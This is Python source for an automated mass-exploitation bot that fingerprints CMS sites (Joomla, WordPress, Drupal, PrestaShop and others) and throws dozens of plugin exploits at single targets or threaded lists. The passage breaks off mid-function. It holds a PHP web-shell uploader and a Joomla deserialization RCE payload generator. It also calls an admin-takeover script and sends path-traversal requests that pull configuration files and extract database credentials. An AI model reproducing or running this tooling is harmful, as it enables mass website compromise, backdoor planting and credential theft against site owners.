  1. import os, re, sys, socket, binascii, time, json, random, threading
  2. from Queue import Queue
  3.  
  4. try:
  5. import requests
  6. except ImportError:
  7. print '---------------------------------------------------'
  8. print '[*] pip install requests'
  9. print ' [-] you need to install requests Module'
  10. sys.exit()
  11.  
  12. class AutoExploiter(object):
  13. def __init__(self):
  14. try:
  15. os.mkdir('result')
  16. except:
  17. pass
  18. try:
  19. os.mkdir('logs')
  20. except:
  21. pass
  22. self.r = '\033[31m'
  23. self.g = '\033[32m'
  24. self.y = '\033[33m'
  25. self.b = '\033[34m'
  26. self.m = '\033[35m'
  27. self.c = '\033[36m'
  28. self.w = '\033[37m'
  29. self.rr = '\033[39m'
  30. self.shell_code = '''
  31. <title>wordpress_project</title>
  32. <?php
  33. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  34. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  35. if( $_POST['_upl'] == "Upload" ) {
  36. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }
  37. else { echo '<b>Not uploaded ! </b><br><br>'; }
  38. }
  39. ?>
  40. '''
  41. self.version = '1.3.9'
  42. self.year = time.strftime("%y")
  43. self.month = time.strftime("%m")
  44. self.EMail = 'email@email.com' # --> add your email for Add admin, Password Will send to this EMail!
  45. self.Jce_Deface_image = 'files/pwn.gif'
  46. self._shell = 'files/shell.jpg'
  47. self.indeX = 'files/index.jpg'
  48. self.TextindeX = 'files/vuln.txt'
  49. self.MailPoetZipShell = 'files/rock.zip'
  50. self.ZipJd = 'files/jdownlods.zip'
  51. self.pagelinesExploitShell = 'files/settings_auto.php'
  52. self.jdShell = 'files/vuln.php3.j'
  53. self.ShellPresta = 'files/up.php'
  54. self.gravShell = 'files/grav.jpg'
  55.  
  56. try:
  57. self.select = sys.argv[1]
  58. except:
  59. self.cls()
  60. self.print_logo()
  61. self.Print_options()
  62. sys.exit()
  63. if self.select == str('1'): # Single
  64. self.cls()
  65. self.print_logo()
  66. self.Url = raw_input(self.r + ' [+]' + self.c + 'Enter Target: ' + self.y)
  67. if self.Url.startswith("http://"):
  68. self.Url = self.Url.replace("http://", "")
  69. elif self.Url.startswith("https://"):
  70. self.Url = self.Url.replace("https://", "")
  71. else:
  72. pass
  73. try:
  74. CheckOsc = requests.get('http://' + self.Url + '/admin/images/cal_date_over.gif')
  75. CheckOsc2 = requests.get('http://' + self.Url + '/admin/login.php')
  76. CheckCMS = requests.get('http://' + self.Url + '/templates/system/css/system.css', timeout=5)
  77. Checktwo = requests.get('http://' + self.Url, timeout=5)
  78. if 'Import project-level system CSS' in CheckCMS.text.encode('utf-8') or CheckCMS.status_code == 200:
  79. self.Print_Scanning(self.Url, 'joomla')
  80. self.RCE_Joomla(self.Url)
  81. self.Joomla_TakeADmin(self.Url)
  82. self.Com_AdsManager_Shell(self.Url)
  83. self.alberghiExploit(self.Url)
  84. self.Com_CCkJseblod(self.Url)
  85. self.Com_Fabric(self.Url)
  86. self.Com_Hdflvplayer(self.Url)
  87. self.Com_Jdownloads_shell(self.Url)
  88. self.Com_Joomanager(self.Url)
  89. self.Com_MyBlog(self.Url)
  90. self.Com_Macgallery(self.Url)
  91. self.JCE_shell(self.Url)
  92. self.Com_s5_media_player(self.Url)
  93. self.JooMLaBruteForce(self.Url)
  94. self.FckEditor(self.Url)
  95. elif '/wp-content/' in Checktwo.text.encode('utf-8'):
  96. self.Print_Scanning(self.Url, 'Wordpress')
  97. self.Revslider_SHELL(self.Url)
  98. self.wysijaExploit(self.Url)
  99. self.WP_User_Frontend(self.Url)
  100. self.Gravity_Forms_Shell(self.Url)
  101. self.HD_WebPlayerSqli(self.Url)
  102. self.pagelinesExploit(self.Url)
  103. self.HeadWayThemeExploit(self.Url)
  104. self.addblockblocker(self.Url)
  105. self.cherry_plugin(self.Url)
  106. self.formcraftExploit_Shell(self.Url)
  107. self.UserProExploit(self.Url)
  108. self.wp_mobile_detector(self.Url)
  109. self.Wp_Job_Manager(self.Url)
  110. self.wp_content_injection(self.Url)
  111. self.Woocomrece(self.Url)
  112. self.viral_optins(self.Url)
  113. self.CateGory_page_icons(self.Url)
  114. self.Downloads_Manager(self.Url)
  115. self.FckEditor(self.Url)
  116. elif '/sites/default/' in Checktwo.text.encode('utf-8')\
  117. or 'content="Drupal' in Checktwo.text.encode('utf-8'):
  118. self.Print_Scanning(self.Url, 'drupal')
  119. self.DrupalGedden2(self.Url)
  120. self.DrupalBruteForce(self.Url)
  121. self.Drupal_Sqli_Addadmin(self.Url)
  122.  
  123. self.FckEditor(self.Url)
  124. elif 'GIF89a' in CheckOsc.text.encode('utf-8') or 'osCommerce' in CheckOsc2.text.encode('utf-8'):
  125. self.Print_Scanning(self.Url, 'osCommerce')
  126. self.osCommerce(self.Url)
  127. self.FckEditor(self.Url)
  128. elif 'prestashop' in Checktwo.text.encode('utf-8'):
  129. self.lib(self.Url)
  130. self.psmodthemeoptionpanel(self.Url)
  131. self.tdpsthemeoptionpanel(self.Url)
  132. self.megamenu(self.Url)
  133. self.nvn_export_orders(self.Url)
  134. self.pk_flexmenu(self.Url)
  135. self.wdoptionpanel(self.Url)
  136. self.fieldvmegamenu(self.Url)
  137. self.wg24themeadministration(self.Url)
  138. self.videostab(self.Url)
  139. self.cartabandonmentproOld(self.Url)
  140. self.cartabandonmentpro(self.Url)
  141. self.advancedslider(self.Url)
  142. self.attributewizardpro_x(self.Url)
  143. self.attributewizardpro3(self.Url)
  144. self.attributewizardpro2(self.Url)
  145. self.attributewizardpro(self.Url)
  146. self.jro_homepageadvertise(self.Url)
  147. self.homepageadvertise2(self.Url)
  148. self.homepageadvertise(self.Url)
  149. self.productpageadverts(self.Url)
  150. self.simpleslideshow(self.Url)
  151. self.vtermslideshow(self.Url)
  152. self.soopabanners(self.Url)
  153. self.soopamobile(self.Url)
  154. self.columnadverts(self.Url)
  155. self.FckEditor(self.Url)
  156. elif 'catalog/view/' in Checktwo.text.encode('utf-8'):
  157. self.OpenCart(self.Url)
  158. self.FckEditor(self.Url)
  159. else:
  160. self.Print_Scanning(self.Url, 'Unknown')
  161. self.FckEditor(self.Url)
  162. except:
  163. self.Timeout(self.Url)
  164. sys.exit()
  165. elif self.select == str('2'): # multi List
  166. self.cls()
  167. try:
  168. self.print_logo()
  169. Get_list = raw_input(self.r + ' [+]' + self.c + ' Enter List Websites: ' + self.y)
  170. with open(Get_list, 'r') as zz:
  171. Readlist = zz.read().splitlines()
  172. except IOError:
  173. print self.r + '--------------------------------------------'
  174. print self.r + ' [' + self.y + '-' + self.r + '] ' + self.c + ' List Not Found in Directory!'
  175. sys.exit()
  176. thread = []
  177. for xx in Readlist:
  178. t = threading.Thread(target=self.Work2, args=(xx, ''))
  179. t.start()
  180. thread.append(t)
  181. time.sleep(0.0002)
  182. for j in thread:
  183. j.join()
  184. elif self.select == str('4'):
  185. try:
  186. self.cls()
  187. self.print_logo()
  188. GoT = requests.get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/update.txt', timeout=5)
  189. if self.version in GoT.text.encode('utf-8'):
  190. print self.r + ' [' + self.y + '-' + self.r + '] ' + self.c +\
  191. "Sorry But You Don't Have New Update ... Try later."
  192. else:
  193. Loop = True
  194. print self.r + ' [' + self.c + '+' + self.r + '] ' + self.g + 'update Is available! Update Now.'
  195. print self.r + ' [' + self.c + '+' + self.r + '] ' + self.y + 'github.com/04x/ICG-AutoExploiterBoT/\n'
  196. while Loop:
  197. Get = raw_input(self.r + ' [' + self.g + '*' + self.r + '] ' + self.c +
  198. 'You Want know What is New in New Version ? [y]es or [n]o : ')
  199. if Get == str('y'):
  200. update_details = requests.get('https://raw.githubusercontent.com/'
  201. '04x/ICG-AutoExploiterBoT/master/files/update_details.txt', timeout=5)
  202. print update_details.text.encode('utf-8')
  203. Loop = False
  204. elif Get == str('n'):
  205. self.cls()
  206. self.print_logo()
  207. Loop = False
  208. else:
  209. continue
  210. except:
  211. self.Timeout('Github.com')
  212. elif self.select == str('3'):
  213. self.cls()
  214. self.print_logo()
  215. self.concurrent = 75
  216. try:
  217. self.Get_list = raw_input(self.r + ' [+]' + self.c + ' Enter List Websites: ' + self.y)
  218. except IOError:
  219. print self.r + '--------------------------------------------'
  220. print self.r + ' [' + self.y + '-' + self.r + '] ' + self.c + ' List Not Found in Directory!'
  221. sys.exit()
  222. self.q = Queue(self.concurrent * 2)
  223. for i in range(self.concurrent):
  224. self.t = threading.Thread(target=self.doWork)
  225. self.t.daemon = True
  226. self.t.start()
  227. try:
  228. for url in open(self.Get_list):
  229. self.q.put(url.strip())
  230. self.q.join()
  231. except:
  232. pass
  233.  
  234. else:
  235. self.cls()
  236. self.print_logo()
  237. print self.r + '--------------------------------------------'
  238. print self.r + ' [' + self.y + '*' + self.r + '] ' + self.c + ' Option Not Found! Try Again...'
  239.  
  240. # elif self.select == str(3): # IP Server
  241. # self.cls()
  242. # IPserv = raw_input(' Enter IP server: ')
  243. # reverse = reverse_ipz()
  244. # reverse.Reverse_ip(IPserv)
  245. # try:
  246. # with open('logs/' + reverse.ip + '.txt', 'r') as reader:
  247. # readlines = reader.read().splitlines()
  248. # except:
  249. # print ' i cant Find List of urls in server! use from option 2.'
  250. # sys.exit()
  251. # for xx in readlines:
  252. # self.Url = xx
  253. # if self.Url.startswith("http://"):
  254. # self.Url = self.Url.replace("http://", "")
  255. # elif self.Url.startswith("https://"):
  256. # self.Url = self.Url.replace("https://", "")
  257. # else:
  258. # pass
  259. # try:
  260. # CheckCMS = requests.get('http://' + self.Url + '/language/en-GB/en-GB.xml', timeout=7)
  261. # if 'version="' in CheckCMS.text.encode('utf-8'):
  262. # self.Print_Scanning(self.Url, 'joomla')
  263. # self.RCE_Joomla()
  264. # self.Joomla_TakeADmin()
  265. # self.Com_AdsManager_Shell()
  266. # self.alberghiExploit()
  267. # self.Com_CCkJseblod()
  268. # self.Com_Fabric()
  269. # self.Com_Hdflvplayer()
  270. # self.Com_Jdownloads_shell()
  271. # self.Com_Joomanager()
  272. # self.Com_MyBlog()
  273. # self.Com_Macgallery()
  274. # self.JCE_shell()
  275. # self.Com_s5_media_player()
  276. # else:
  277. # self.Print_Scanning(self.Url, 'Unknown')
  278. # except requests.ConnectionError:
  279. # self.Timeout(self.Url)
  280. def Work2(self, url, x):
  281. try:
  282. if url.startswith("http://"):
  283. url = url.replace("http://", "")
  284. elif url.startswith("https://"):
  285. url = url.replace("https://", "")
  286. else:
  287. pass
  288. CheckOsc = requests.get('http://' + url + '/admin/images/cal_date_over.gif', timeout=10)
  289. CheckOsc2 = requests.get('http://' + url + '/admin/login.php', timeout=10)
  290. CheckCMS = requests.get('http://' + url + '/templates/system/css/system.css', timeout=5)
  291. Checktwo = requests.get('http://' + url, timeout=5)
  292. if 'Import project-level system CSS' in CheckCMS.text.encode('utf-8') or CheckCMS.status_code == 200:
  293. self.RCE_Joomla(url)
  294. self.Joomla_TakeADmin(url)
  295. self.Com_AdsManager_Shell(url)
  296. self.alberghiExploit(url)
  297. self.Com_CCkJseblod(url)
  298. self.Com_Fabric(url)
  299. self.Com_Hdflvplayer(url)
  300. self.Com_Jdownloads_shell(url)
  301. self.Com_Joomanager(url)
  302. self.Com_MyBlog(url)
  303. self.Com_Macgallery(url)
  304. self.JCE_shell(url)
  305. self.Com_s5_media_player(url)
  306. self.JooMLaBruteForce(url)
  307. self.FckEditor(url)
  308. self.q.task_done()
  309. elif '/wp-content/' in Checktwo.text.encode('utf-8'):
  310. self.Revslider_SHELL(url)
  311. self.wysijaExploit(url)
  312. self.WP_User_Frontend(url)
  313. self.Gravity_Forms_Shell(url)
  314. self.HD_WebPlayerSqli(url)
  315. self.pagelinesExploit(url)
  316. self.HeadWayThemeExploit(url)
  317. self.addblockblocker(url)
  318. self.cherry_plugin(url)
  319. self.formcraftExploit_Shell(url)
  320. self.UserProExploit(url)
  321. self.wp_mobile_detector(url)
  322. self.Wp_Job_Manager(url)
  323. self.wp_content_injection(url)
  324. self.viral_optins(url)
  325. self.Woocomrece(url)
  326. self.CateGory_page_icons(url)
  327. self.Downloads_Manager(url)
  328. self.FckEditor(url)
  329. self.q.task_done()
  330. elif '/sites/default/' in Checktwo.text.encode('utf-8') \
  331. or 'content="Drupal' in Checktwo.text.encode('utf-8'):
  332. self.Drupal_Sqli_Addadmin(url)
  333. self.DrupalGedden2(url)
  334. self.DrupalBruteForce(url)
  335. self.FckEditor(url)
  336. self.q.task_done()
  337. elif 'GIF89a' in CheckOsc.text.encode('utf-8') or 'osCommerce' in CheckOsc2.text.encode('utf-8'):
  338. self.osCommerce(url)
  339. self.FckEditor(url)
  340. self.q.task_done()
  341. elif 'prestashop' in Checktwo.text.encode('utf-8'):
  342. self.lib(url)
  343. self.psmodthemeoptionpanel(url)
  344. self.tdpsthemeoptionpanel(url)
  345. self.megamenu(url)
  346. self.nvn_export_orders(url)
  347. self.pk_flexmenu(url)
  348. self.wdoptionpanel(url)
  349. self.fieldvmegamenu(url)
  350. self.wg24themeadministration(url)
  351. self.videostab(url)
  352. self.cartabandonmentproOld(url)
  353. self.cartabandonmentpro(url)
  354. self.advancedslider(url)
  355. self.attributewizardpro_x(url)
  356. self.attributewizardpro3(url)
  357. self.attributewizardpro2(url)
  358. self.attributewizardpro(url)
  359. self.jro_homepageadvertise(url)
  360. self.homepageadvertise2(url)
  361. self.homepageadvertise(url)
  362. self.productpageadverts(url)
  363. self.simpleslideshow(url)
  364. self.vtermslideshow(url)
  365. self.soopabanners(url)
  366. self.soopamobile(url)
  367. self.columnadverts(url)
  368. self.FckEditor(url)
  369. self.q.task_done()
  370. elif 'catalog/view/' in Checktwo.text.encode('utf-8'):
  371. self.OpenCart(self.Url)
  372. self.FckEditor(self.Url)
  373. self.q.task_done()
  374. else:
  375. self.FckEditor(url)
  376. self.q.task_done()
  377. except:
  378. pass
  379. def doWork(self):
  380. try:
  381. while True:
  382. url = self.q.get()
  383. if url.startswith('http://'):
  384. url = url.replace('http://', '')
  385. elif url.startswith("https://"):
  386. url = url.replace('https://', '')
  387. else:
  388. pass
  389. try:
  390. CheckOsc = requests.get('http://' + url + '/admin/images/cal_date_over.gif', timeout=10)
  391. CheckOsc2 = requests.get('http://' + url + '/admin/login.php', timeout=10)
  392. CheckCMS = requests.get('http://' + url + '/templates/system/css/system.css', timeout=5)
  393. Checktwo = requests.get('http://' + url, timeout=5)
  394. if 'Import project-level system CSS' in CheckCMS.text.encode('utf-8') or CheckCMS.status_code == 200:
  395. self.RCE_Joomla(url)
  396. self.Joomla_TakeADmin(url)
  397. self.Com_AdsManager_Shell(url)
  398. self.alberghiExploit(url)
  399. self.Com_CCkJseblod(url)
  400. self.Com_Fabric(url)
  401. self.Com_Hdflvplayer(url)
  402. self.Com_Jdownloads_shell(url)
  403. self.Com_Joomanager(url)
  404. self.Com_MyBlog(url)
  405. self.Com_Macgallery(url)
  406. self.JCE_shell(url)
  407. self.Com_s5_media_player(url)
  408. self.JooMLaBruteForce(url)
  409. self.FckEditor(url)
  410. self.q.task_done()
  411. elif '/wp-content/' in Checktwo.text.encode('utf-8'):
  412. self.Revslider_SHELL(url)
  413. self.wysijaExploit(url)
  414. self.WP_User_Frontend(url)
  415. self.Gravity_Forms_Shell(url)
  416. self.HD_WebPlayerSqli(url)
  417. self.pagelinesExploit(url)
  418. self.HeadWayThemeExploit(url)
  419. self.addblockblocker(url)
  420. self.cherry_plugin(url)
  421. self.formcraftExploit_Shell(url)
  422. self.UserProExploit(url)
  423. self.wp_mobile_detector(url)
  424. self.Wp_Job_Manager(url)
  425. self.wp_content_injection(url)
  426. self.viral_optins(url)
  427. self.Woocomrece(url)
  428. self.CateGory_page_icons(url)
  429. self.Downloads_Manager(url)
  430. self.FckEditor(url)
  431. self.q.task_done()
  432. elif '/sites/default/' in Checktwo.text.encode('utf-8') \
  433. or 'content="Drupal' in Checktwo.text.encode('utf-8'):
  434. self.Drupal_Sqli_Addadmin(url)
  435. self.DrupalGedden2(url)
  436. self.DrupalBruteForce(url)
  437. self.FckEditor(url)
  438. self.q.task_done()
  439. elif 'GIF89a' in CheckOsc.text.encode('utf-8') or 'osCommerce' in CheckOsc2.text.encode('utf-8'):
  440. self.osCommerce(url)
  441. self.FckEditor(url)
  442. self.q.task_done()
  443. elif 'prestashop' in Checktwo.text.encode('utf-8'):
  444. self.lib(url)
  445. self.psmodthemeoptionpanel(url)
  446. self.tdpsthemeoptionpanel(url)
  447. self.megamenu(url)
  448. self.nvn_export_orders(url)
  449. self.pk_flexmenu(url)
  450. self.wdoptionpanel(url)
  451. self.fieldvmegamenu(url)
  452. self.wg24themeadministration(url)
  453. self.videostab(url)
  454. self.cartabandonmentproOld(url)
  455. self.cartabandonmentpro(url)
  456. self.advancedslider(url)
  457. self.attributewizardpro_x(url)
  458. self.attributewizardpro3(url)
  459. self.attributewizardpro2(url)
  460. self.attributewizardpro(url)
  461. self.jro_homepageadvertise(url)
  462. self.homepageadvertise2(url)
  463. self.homepageadvertise(url)
  464. self.productpageadverts(url)
  465. self.simpleslideshow(url)
  466. self.vtermslideshow(url)
  467. self.soopabanners(url)
  468. self.soopamobile(url)
  469. self.columnadverts(url)
  470. self.FckEditor(url)
  471. self.q.task_done()
  472. elif 'catalog/view/' in Checktwo.text.encode('utf-8'):
  473. self.OpenCart(self.Url)
  474. self.FckEditor(self.Url)
  475. self.q.task_done()
  476. else:
  477. self.FckEditor(url)
  478. self.q.task_done()
  479. except:
  480. pass
  481. except:
  482. pass
  483.  
  484.  
  485.  
  486. def print_logo(self):
  487. clear = "\x1b[0m"
  488. colors = [36, 32, 34, 35, 31, 37]
  489.  
  490. x = """
  491.  
  492.  
  493. White HaT Hackers
  494. _ ______ _ _ _
  495. /\ | | | ____| | | (_) |
  496. / \ _ _| |_ ___ | |__ __ ___ __ | | ___ _| |_ ___ _ __
  497. / /\ \| | | | __/ _ \| __| \ \/ / '_ \| |/ _ \| | __/ _ \ '__|
  498. / ____ \ |_| | || (_) | |____ > <| |_) | | (_) | | || __/ |
  499. /_/ \_\__,_|\__\___/|______/_/\_\ .__/|_|\___/|_|\__\___|_|
  500. | |
  501. IRan-Cyber.Net |_| gitHub.com/04x
  502.  
  503. Note! : We don't Accept any responsibility for any illegal usage.
  504. """
  505. for N, line in enumerate(x.split("\n")):
  506. sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
  507. time.sleep(0.05)
  508.  
  509. def Print_options(self):
  510. print self.r + ' [' + self.y + '1' + self.r + '] ' + self.c + 'Single Target' + self.w +\
  511. ' [ ' + 'python AutoExploit.py 1' + ' ]'
  512. print self.r + ' [' + self.y + '2' + self.r + '] ' + self.c + 'List Scan' + self.w + ' [ ' + 'python AutoExploit.py 2' + ' ]'
  513. print self.r + ' [' + self.y + '3' + self.r + '] ' + self.c + 'Thread List Scan' + self.w + ' [ ' + 'python AutoExploit.py 3' + ' ]'
  514. print self.r + ' [' + self.y + '4' + self.r + '] ' + self.c + 'Check Update' + self.w + ' [ ' + 'python AutoExploit.py 4' + ' ]'
  515.  
  516.  
  517.  
  518. def Print_Scanning(self, url, CMS):
  519. print self.r + ' [' + self.y + '*' + self.r + '] ' + self.c + url + self.w + ' [ ' + CMS + ' ]'
  520.  
  521.  
  522. def Timeout(self, url):
  523. print self.r + ' [' + self.y + '*' + self.r + '] ' + self.c + url + self.r + ' [ TimeOut!!/NotValid Url ]'
  524.  
  525. def Print_NotVuln(self, NameVuln, site):
  526. print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' + self.y + NameVuln + self.c + ' [Not Vuln]'
  527.  
  528. def Print_Username_Password(self, username, Password):
  529. print self.y + ' [' + self.c + '+' + self.y + '] ' + self.c + 'Username: ' + self.g + username
  530. print self.y + ' [' + self.c + '+' + self.y + '] ' + self.c + 'Password: ' + self.g + Password
  531.  
  532.  
  533. def Print_Vuln(self, NameVuln, site):
  534. print self.c + ' [' + self.y + '+' + self.c + '] ' + self.r + site + ' ' + self.y + NameVuln + self.g + ' [Vuln!!]'
  535.  
  536. def Print_Vuln_index(self, indexPath):
  537. print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + indexPath + self.g + ' [Index Uploaded!]'
  538.  
  539. def Print_vuln_Shell(self, shellPath):
  540. print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + shellPath + self.g + ' [Shell Uploaded!]'
  541.  
  542. def Print_vuln_Config(self, pathconfig):
  543. print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + pathconfig + self.g + ' [Config Downloaded!]'
  544.  
  545.  
  546. def cls(self):
  547. linux = 'clear'
  548. windows = 'cls'
  549. os.system([linux, windows][os.name == 'nt'])
  550.  
  551. def RCE_Joomla(self, site):
  552. try:
  553. pl = self.generate_payload(
  554. "base64_decode('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')")
  555. headers = {
  556. 'User-Agent': pl
  557. }
  558. try:
  559. cookies = requests.get('http://' + site, headers=headers, timeout=5).cookies
  560. except:
  561. pass
  562. try:
  563. rr = requests.get('http://' + site + '/', headers=headers, cookies=cookies, timeout=5)
  564. if rr:
  565. requests.get('http://' + site + '/images/vuln2.php', timeout=5)
  566. requests.get('http://' + site + '/tmp/vuln2.php', timeout=5)
  567. ShellCheck = requests.get('http://' + site + '/images/vuln.php', timeout=5)
  568. ShellCheck2 = requests.get('http://' + site + '/tmp/vuln.php', timeout=5)
  569. if 'Vuln!!' in ShellCheck.text:
  570. self.Print_vuln_Shell(site + '/images/vuln.php')
  571. with open('result/Shell_results.txt', 'a') as writer:
  572. writer.write('http://' + site + '/images/vuln.php' + '\n')
  573. IndexCheck = requests.get('http://' + site + '/vuln.htm', timeout=5)
  574. IndexCheck2 = requests.get('http://' + site + '/images/vuln.htm', timeout=5)
  575. if 'Vuln!!' in IndexCheck.text:
  576. self.Print_Vuln_index(site + '/vuln.htm')
  577. with open('result/Index_results.txt', 'a') as writer:
  578. writer.write('http://' + site + '/vuln.htm' + '\n')
  579. elif 'Vuln!!' in IndexCheck2.text:
  580. self.Print_Vuln_index(site + '/images/vuln.htm')
  581. with open('result/Index_results.txt', 'a') as writer:
  582. writer.write('http://' + site + '/images/vuln.htm' + '\n')
  583. elif 'Vuln!!' in ShellCheck2.text:
  584. self.Print_vuln_Shell(site + '/tmp/vuln.php')
  585. with open('result/Shell_results.txt', 'a') as writer:
  586. writer.write('http://' + site + '/tmp/vuln.php' + '\n')
  587. IndexCheck = requests.get('http://' + site + '/vuln.htm', timeout=5)
  588. IndexCheck2 = requests.get('http://' + site + '/images/vuln.htm', timeout=5)
  589. if 'Vuln!!' in IndexCheck.text:
  590. self.Print_Vuln_index(site + '/vuln.htm')
  591. with open('result/Index_results.txt', 'a') as writer:
  592. writer.write('http://' + site + '/vuln.htm' + '\n')
  593. elif 'Vuln!!' in IndexCheck2.text:
  594. self.Print_Vuln_index(site + '/images/vuln.htm')
  595. with open('result/Index_results.txt', 'a') as writer:
  596. writer.write('http://' + site + '/images/vuln.htm' + '\n')
  597. else:
  598. self.Print_NotVuln('RCE Joomla', site)
  599. else:
  600. self.Print_NotVuln('RCE Joomla', site)
  601. except:
  602. self.Print_NotVuln('RCE Joomla', site)
  603. except:
  604. self.Print_NotVuln('RCE Joomla', site)
  605.  
  606. def php_str_noquotes(self, data):
  607. try:
  608. encoded = ""
  609. for char in data:
  610. encoded += "chr({0}).".format(ord(char))
  611. return encoded[:-1]
  612. except:
  613. pass
  614.  
  615. def generate_payload(self, php_payload):
  616. try:
  617. php_payload = "eval({0})".format(php_payload)
  618. terminate = '\xf0\xfd\xfd\xfd';
  619. exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
  620. injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
  621. exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
  622. exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
  623. return exploit_template
  624. except:
  625. pass
  626.  
  627.  
  628. def Joomla_TakeADmin(self, site):
  629. try:
  630. GetVersion = requests.get('http://' + site + '/language/en-GB/en-GB.xml', timeout=5)
  631. if 'version="3.' in GetVersion.text.encode('utf-8'):
  632. os.system('python files/adminTakeover.py -u MArKAntoni -p MArKAntoni -e ' +
  633. self.EMail + ' http://' + site)
  634. except:
  635. self.Print_NotVuln('Maybe Add Admin 3.x', site)
  636.  
  637. def Com_s5_media_player(self, site):
  638. try:
  639. Exp = 'http://' + site + \
  640. '/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA='
  641. GetConfig = requests.get(Exp, timeout=5)
  642. if 'JConfig' in GetConfig.text.encode('utf-8'):
  643. self.Print_vuln_Config(site)
  644. with open('result/Config_results.txt', 'a') as ww:
  645. ww.write('Full Config Path : ' + Exp + '\n')
  646. try:
  647. Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
  648. Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
  649. Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
  650. Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
  651. with open('result/Config_results.txt', 'a') as ww:
  652. ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
  653. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
  654. 0] + '\n---------------------\n')
  655. except:
  656. pass
  657. else:
  658. self.Print_NotVuln('Com_s5_media_player', site)
  659. except:
  660. self.Print_NotVuln('Com_s5_media_player', site)
  661.  
  662. def Com_Hdflvplayer(self, site):
  663. try:
  664. Exp = 'http://' + site + \
  665. '/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php'
  666. GetConfig = requests.get(Exp, timeout=5)
  667. if 'JConfig' in GetConfig.text.encode('utf-8'):
  668. self.Print_vuln_Config(site)
  669. with open('result/Config_results.txt', 'a') as ww:
  670. ww.write('Full Config Path : ' + Exp + '\n')
  671. try:
  672. Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
  673. Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
  674. Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
  675. Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
  676. with open('result/Config_results.txt', 'a') as ww:
  677. ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
  678. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
  679. 0] + '\n---------------------\n')
  680. except:
  681. pass
  682. else:
  683. self.Print_NotVuln('Com_Hdflvplayer', site)
  684. except:
  685. self.Print_NotVuln('Com_Hdflvplayer', site)
  686.  
  687. def Com_Joomanager(self, site):
  688. try:
  689. Exp = 'http://' + site + \
  690. '/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php'
  691. GetConfig = requests.get(Exp, timeout=5)
  692. if 'JConfig' in GetConfig.text.encode('utf-8'):
  693. self.Print_vuln_Config(site)
  694. with open('result/Config_results.txt', 'a') as ww:
  695. ww.write('Full Config Path : ' + Exp + '\n')
  696. try:
  697. Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
  698. Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
  699. Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
  700. Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
  701. with open('result/Config_results.txt', 'a') as ww:
  702. ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
  703. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
  704. 0] + '\n---------------------\n')
  705. except:
  706. self.Print_NotVuln('Com_Joomanager', site)
  707. else:
  708. self.Print_NotVuln('Com_Joomanager', site)
  709. except:
  710. self.Print_NotVuln('Com_Joomanager', site)
  711.  
  712.  
  713. def Com_Macgallery(self, site):
  714. try:
  715. Exp = 'http://' + site + '/index.php?option=com_macgallery&view=download&albumid=../../configuration.php'
  716. GetConfig = requests.get(Exp, timeout=5)
  717. if 'JConfig' in GetConfig.text.encode('utf-8'):
  718. self.Print_vuln_Config(site)
  719. with open('result/Config_results.txt', 'a') as ww:
  720. ww.write('Full Config Path : ' + Exp + '\n')
  721. try:
  722. Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
  723. Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
  724. Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
  725. Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
  726. with open('result/Config_results.txt', 'a') as ww:
  727. ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
  728. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
  729. 0] + '\n---------------------\n')
  730. except:
  731. self.Print_NotVuln('Com_Macgallery', site)
  732. else:
  733. self.Print_NotVuln('Com_Macgallery', site)
  734. except:
  735. self.Print_NotVuln('Com_Macgallery', site)
  736.  
  737. def Com_CCkJseblod(self, site):
  738. try:
  739. Exp = 'http://' + site + '/index.php?option=com_cckjseblod&task=download&file=configuration.php'
